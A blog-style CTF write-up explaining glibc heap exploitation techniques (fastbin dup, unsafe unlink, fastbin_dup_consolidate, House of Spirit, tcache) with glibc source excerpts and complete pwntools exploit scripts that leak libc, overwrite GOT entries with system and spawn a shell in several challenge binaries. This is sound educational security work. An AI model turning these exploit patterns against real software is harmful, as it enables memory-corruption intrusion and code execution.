How to heap?

In this post, I will play with some classic heap exploitation tricks in Linux Glibc, in order to better understand the linux kernel heap management.

Background

Heap is a logically continuous area that consists of many chunks. For heap allocator such as ptmalloc, the minimum operation unit is the chunk. Chunks are classified into 4 different categories. 1. Allocated chunk 2, Free chunk; 3, Top chunk; 4. Last Remainder chunk. malloc maintains a finite state machine whitin the four types of chunks. A detailed analysis of ptmalloc anylasis can be find here (in Chinese) ptmalloc code review in glibc 2.12.1

Fastbin

Fastbin is one of the four freelist data structures (fast bin, unsorted bin, small bin, large bin) that are used to hold free chunks. Many attacks relates to fastbins.
In malloc_state (heap header), there is an array called fastbinsY that manages the fast bins. In Linux, chunks that are smaller than MAX_FAST_SIZE (80 on 32-bit machine, 160 on 64-bit machine) will be treated as fastbins. The figure below demonstrates the runtime structure of fastbin.

1
2
1570	/* The maximum fastbin request size we support */
1571 #define MAX_FAST_SIZE (80 * SIZE_SZ / 4)

Techniques

fastbin_dup_stack

fastbin_dup_into_stack introduce a technique to forge a fake chunk by modifiying(heap overflow or double free) a specific fast bin’s FD to the target address.

The trick has three steps. Step 1, we put the a victim chunk into bins by freeing it. Step 2, we need a double free or heap overflow(Double free puts the victim chunk into fastbin, and modified its fd using exsting reference to the chunk. Heap overflow can directly overflow the next chunk’s fd when it is still in use) to modify the victim chunk’s fd to the target address to claim that there is another chunk there. It is worth noting that in order to pass the malloc check we also need the allocation point at the target address has a legal size. Step 3, we malloc two times. The first time will put the fake chunk at the head of free list. The second time will malloc a chunk at the target address.

The 0ctfbabyheap challenge can be solved with this trick. The trick was used for twice. In the first time, we are trying to leak the libc base. To achieve this goal, we forge a fast chunk at the smallbins (Our target address is at smallbin is because smallbin has bk pointer which points to the main_arena when the smallbin is at the head of smallbin free list). The following code demonstrate the processs.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#STEP 1 Free a victim
allocate(0x10) #idx0
allocate(0x10) #idx1
allocate(0x10) #idx2
allocate(0x10) #idx3
allocate(0x80) #idx4 smallbin
free(2)
free(1) # victim chunk

#STEP 2 modifying the victim's fd
payload = 'a'*0x10 + p64(0) + p64(0x21) + p8(0x80)
fill(0,len(payload),payload)
payload = 'a'*0x10 + p64(0) + p64(0x21)
fill(3,len(payload),payload) # in order to pass the size check

##STEP 3 malloc a fake chunk at target addr
allocate(0x10) #idx1 put addr of idx4 at the head list of fastbin
allocate(0x10) #idx2 got smallbin
payload = 'a'*0x10 + p64(0) + p64(0x91) #before idx4 into smallbin, restore its real size
fill(3,len(payload),payload)
allocate(0x10) # idx 5 we needs this to avoid consolidate
free(4) # now idx4 is in smallbin and idx2 points to the smallbin
dump(2)
p.recvuntil('Content: \n')
unsortedbin_addr = u64(p.recv(8))

unsafe unlink technique can be used when you have a pointer at a known location (e.g., .bss) that points to a region you can call unlink on. The most common scenario is a vulnerable buffer that can be overflown and has a global pointer. The attack effect is let this pointer points to &pointer - 0x18 (ptr = &ptr - 0x18).

To demonstrate how the attack effect is achieved, we assume we have p0 and p1, and the two chunk are the neighbours. First, we craft a fake chunk in p0 . We also need to modified the prev_size in p1 to pass the check. In this way, we cheat glibc thatp1‘s neighbour is the freed fake chunk. Second, we free p1 to let fake chunk also be freed at the same time. The process can be demonstrated as the following picture.

The stkof challenge can be solved with this trick.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
from pwn import *

context.log_level = 'debug'
p = process('./stkof')
stkof = ELF('./stkof')
libc = ELF('libc.so.6')
ptr = 0x602140

def alloc(size):
p.sendline('1')
p.sendline(str(size))
p.recvuntil('OK\n')


def edit(idx, content):
p.sendline('2')
p.sendline(str(idx))
p.sendline(str(len(content)))
p.send(content)
p.recvuntil('OK\n')

def free(idx):
p.sendline('3')
p.sendline(str(idx))



def exp():
alloc(0x80) #idx1 for io buf init
alloc(0x80) #idx2 fake chunk here
alloc(0x80) #idx3

# Build fake chunk
payload = p64(0) # prev_size
payload += p64(0x1) #size
payload += p64(ptr+0x10-0x18) # fake fd bk
payload += p64(ptr+0x10-0x10)
payload += p64(0)*12
payload += p64(0x80) # p = chunk_at_offset(p, -((long) prevsize));
payload += p64(0x90)
edit(2,payload)
free(3) #trigger unlink
p.recvuntil('OK\n')

#leak
#set ptr0 free@got.plt, ptr1 puts@got.plt +
payload = 'a'*8 + p64(stkof.got['free']) + p64(stkof.got['puts']) + p64(stkof.got['atoi'])
edit(2,payload)
#set free@got.plt as puts@plt
payload = p64(stkof.plt['puts'])
edit(0,payload)
free(1)
puts_addr = u64(p.recvuntil('\nOK\n', drop=True).ljust(8, '\x00'))
libc_base = puts_addr - libc.symbols['puts']
log.success('libc_base: ' + hex(libc_base))

#calc system and binsh ...
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search('/bin/sh'))
payload = p64(system_addr)

# modify atoi@got to system addr
payload = p64(system_addr)
edit(2, payload) #set atoi.got.plt to system
p.send(p64(binsh_addr))
#gdb.attach(p)


if __name__ == '__main__':
exp()
p.interactive()

fastbin_dup_consolidate

fastbin_dup_consolidate abuses the malloc_consolidate in malloc.c:L3672 to allocate a freed fast bin into unsorted bins. The underlying malloc code is as followed.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
fb = &fastbin (av, 0);
/*iterating fastbinY to get different size of fast bins*/
do {
p = atomic_exchange_acq (fb, 0);
if (p != 0) {
/*iterating differnt-size chunk lists*/
do {
/*get a free fast chunk?*/
check_inuse_chunk(av, p);
nextp = p->fd;

/* Slightly streamlined version of consolidation code in free() */
size = p->size & ~(PREV_INUSE|NON_MAIN_ARENA);
nextchunk = chunk_at_offset(p, size); //next chunk in the HEAP SEGMENT
nextsize = chunksize(nextchunk);

/*consolidate its previous chunk first*/
if (!prev_inuse(p)) {
prevsize = p->prev_size;
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
unlink(p, bck, fwd);
}

/*consolidate its next chunk secondly*/
// 这里有两种情况,一种情况当前fastchunk和top chunk相连,这时候这两者直接合并,否则,会将当前fastchunk丢到unsorted bins

In the Sleepyholder challenge, we leverage fastbin_dup_consolidate to set the previous_in_use as false in the neighbour chunk of the fake chunk. By this way, the unlink will unlink the fake chunk when freeing its neighbour. Here, it is worth nothing that we need double free small chunk because we want the big chunk’s pre_inuse to be false. If we don’t free it twice. malloc will use the record from small bins (the destination of malloc_consolidate for fast chunk) and mark the big chunk’s pre_inuse as true.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
from pwn import *

context.log_level = 'debug'
p = process('./holder')
holder = ELF('holder')
libc = ELF('libc.so.6')
f_ptr = 0x6020d0
s_ptr = 0x6020c0

def add(index, content):
p.recvuntil("Renew secret\n")
p.sendline("1")
p.recvuntil("\n")
p.sendline(str(index))
p.recvuntil("secret: \n")
p.send(content)

def delete(index):
p.recvuntil("3. Renew secret\n")
p.sendline("2")
p.recvuntil("Big secret\n")
p.send(str(index))

def update(index, content):
p.recvuntil("Renew secret\n")
p.sendline("3")
p.recvuntil("Big secret\n")
p.sendline(str(index))
p.recvuntil("secret: \n")
p.send(content)


def exp():
add(1,"aaa") # small secret
#seperate small sec and top chunk to avoid small sec being consolidate into top chunk when add huge secret
add(2,"bbb")
delete(1)
add(3, 'ccc') #huge secret to trigger malloc_consolidate() to let small sec get into unsorted bin
delete(1)
# Build a fake chunk
payload = p64(0) # prev_size
payload += p64(0x1) #any size is ok, nobody check it
payload += p64(f_ptr-0x18) # fake fd bk
payload += p64(f_ptr-0x10)
payload += p64(0x20)
add(1,payload)
delete(2) #triger unlink
#now small secret points to f_ptr - 0x18

#leak libc base
free_addr = holder.got['free']
atoi_addr = holder.got['atoi']
puts_addr = holder.got['puts']
puts_plt = holder.plt['puts']
#set s_ptr to free@got.plt
payload = p64(0) # offset to s_ptr
# s_ptr -> atoi; blank -> puts ; f_ptr -> free
payload += p64(atoi_addr) + p64(puts_addr) + p64(free_addr)
update(1,payload)
#set free@got.plt to puts@plt
update(1, p64(puts_plt))
delete(2) #puts(addr of atoi)
libc_base = u64(p.recvn(6).ljust(8, "\x00")) - libc.symbols['atoi']
log.success("libc_base "+ hex(libc_base))

#get shell
system_addr = libc_base + libc.symbols['system']
#set free.plt.got to system
payload = p64(system_addr)
update(1,payload)
#set s_ptr as command
add(2, "/bin/sh\x00")
delete(2) # system(*s_ptr)
#gdb.attach(p)


if __name__ == '__main__':
exp()
p.interactive()

House of Spirit

House of Spirit Essentially it involves us writing two integers (chunk size) to an area we control (it will be in the bss global variables section in the following challenge) to make fake fast chunks.
The prerequisite of forging fake chunks can be figured out from the malloc.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
//Constraint 1  ISMMAP should not be 1
//__libc_free (void *mem)

if (chunk_is_mmapped (p)) /* release mmapped memory. */
{
......
munmap_chunk (p);
return;
}

//Constraint 2 nextchunk size of fake chunk1 should between 2* SIZE_SZ and av->system_mem
// _int_free
if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
|| __builtin_expect (chunksize (chunk_at_offset (p, size))
>= av->system_mem, 0))

//Constraint 3 fake chunk address must aligned
// _int_free
if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
|| __builtin_expect (misaligned_chunk (p), 0))
{
errstr = "free(): invalid pointer";

Hence, we can forge two chunks (chunk1 is fast chunk) by injecting two size in a appropriate offset. It is worth noting that constraint 3 is likely to be confused with fastbin attack (e.g., babyheap 0ctf 2017dow). When malloc() something, unlike free(), we in fact don’t need address alignment.

The Hack.Lu Oreo challenge can be addressed by hos. In this challenge, we have a heap overflow to let us have the ptr in free(ptr) points to any address we want. We also find that we can inject two integers into .bss by absuing two global variables (rifle_cnt and messages).
The exploitation process is quite trivial. The only thing that took me some time is how to reconstruct structs in IDA[3].

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#!/usr/bin/env python
# -*- coding=utf-8 -*-
from pwn import *

context.log_level = 'debug'
p = process('./oreo',stdin=PTY)
oreo = ELF('oreo')
libc = ELF('libc-2.23.so')

first_chunk = 0x0804A2A0
message_area = 0x0804A2C0


def add(name, descrip):
p.readuntil("Action:")
p.sendline("1")
p.readuntil("name:")
p.sendline(name)
p.readuntil("description:")
p.sendline(descrip)

def show_rifles():
p.readuntil("Action:")
p.sendline("2")
p.readuntil("Name: ")
p.readuntil("Name: ")
return u32(p.read(4))

def free():
p.readuntil("Action:")
p.sendline("3")

def leave(message):
p.readuntil("Action:")
p.sendline("4")
p.readuntil("order: ")
p.sendline(message)


def exp():
# leak libc by setting next rifle as address of sscanf,got.plt - 25
payload = "a"*0x1b + p32(oreo.got['__isoc99_sscanf'] - 25)
add(payload,"aaa")
libc_base = show_rifles() - libc.symbols['__isoc99_sscanf']
log.success("libc_base "+ hex(libc_base))

#now house of spirit!
# Step1 forge two fake chunks on .bss
for i in range(0,63):
payload = "1"*0x1b + p32(0x0)
add(payload,"aaaaa")
free()
# calc the offset for next fake chunk
payload = ((0x40 + first_chunk) - message_area) * '\x00' + p32(0) + p32(0x1234)
leave(payload)
#Step2 overwrite pre_add ptr to point to fake chunk
payload = "a"*0x1b + p32(first_chunk+0x8)
add(payload,"aaaaa")
free() #now fake chunk is on the top of the fastbin free list

#hijacking
system = libc_base + libc.symbols['system']
add("aaa",p32(oreo.got['__isoc99_sscanf'])) #overwrite msg_ptr with the address that we want to write things

leave(p32(system))
p.sendline("/bin/sh")



#gdb.attach(p)
#raw_input()

if __name__ == '__main__':
exp()
p.interactive()

tcache

tcache tcache is a caching scheme to make chunk allocating faster introduced since GLIBC 2.26. It has few security checks so it is quite vulnerable and is abused a lot in pwn. Before we discuss how we can abuse it, I would like to share you with some important codes relating to tcache.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
//malloc.c:L2629 
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
//获取chunk的fd字段地址,将其转换为tcache_entry结构体
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);

/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;
//将当前tcache链表头的值放入到e的next字段
e->next = tcache->entries[tc_idx];
//将e放入tcache链表头
tcache->entries[tc_idx] = e;
//将tcache链表计数器的值增一
++(tcache->counts[tc_idx]);
}

/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
assert (tc_idx < TCACHE_MAX_BINS);
assert (tcache->entries[tc_idx] > 0);
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
e->key = NULL;
return (void *) e;
}

Reference

[1] https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/
[2] ptmalloc code review http://fxiao.me/files/glibc-2.12.1-ptmalloc.pdf
[3] https://www.hex-rays.com/products/ida/support/tutorials/structs.shtml